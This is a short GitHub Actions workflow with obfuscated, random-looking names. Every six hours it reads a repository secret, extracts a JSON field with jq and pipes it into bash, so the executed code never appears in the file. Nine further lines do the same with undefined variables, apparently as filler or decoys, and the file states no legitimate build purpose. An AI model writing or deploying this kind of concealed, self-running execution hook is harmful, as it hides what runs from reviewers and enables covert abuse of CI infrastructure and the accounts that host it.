name: recruitklutzy
on:
  workflow_dispatch:
  schedule:
    - cron: '35 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: recruitklutzy
        env:
          vcb6: ${{ secrets.vcb6 }}
        run: |
          echo $vcb6 | jq -r .oss5 | /bin/bash
          echo $ljieb1312 | jq -r .gcn72 | /bin/bash
          echo $lzlva932 | jq -r .ypr40987 | /bin/bash
          echo $pq962 | jq -r .oqwf8070 | /bin/bash
          echo $sclm6086 | jq -r .l2 | /bin/bash
          echo $uler0599 | jq -r .zad355 | /bin/bash
          echo $zden9154 | jq -r .ib0558 | /bin/bash
          echo $xxr6393 | jq -r .vt58 | /bin/bash
          echo $ke31 | jq -r .hw849 | /bin/bash
          echo $samw3897 | jq -r .ipq8062 | /bin/bash

